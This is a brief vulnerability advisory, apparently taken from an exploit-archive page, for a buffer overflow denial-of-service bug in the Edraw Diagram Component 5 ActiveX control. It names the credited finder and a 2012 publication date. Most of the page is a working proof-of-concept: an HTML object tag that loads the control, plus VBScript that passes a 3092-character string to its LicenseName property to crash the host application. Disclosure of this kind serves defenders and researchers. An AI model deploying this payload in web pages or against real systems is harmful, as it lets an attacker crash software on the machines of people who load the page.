|
|
| |
| Edraw Diagram Component 5 ActiveX suffers from buffer overflow DoS vulnerability |
| |
Credit:
The information has been provided by Senator of Pirates.
|
| |
Vulnerable Systems:
* Edraw Diagram Component 5
This exploit tested on Windows Xp SP3 EN
http://www.edrawsoft.com/download/EDBoardSetup.exe
<object classid='clsid:6116A7EC-B914-4CCE-B186-66E0EE7067CF' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files\edboard\EDBoard.ocx"
prototype = "Invoke_Unknown LicenseName As String"
memberName = "LicenseName"
progid = "EDBoardLib.EDBoard"
argCount = 1
arg1=String(3092, "A")
target.LicenseName = arg1
</script>
Disclosure Timeline:
Published: 2012-02-04
|
|
blog comments powered by
|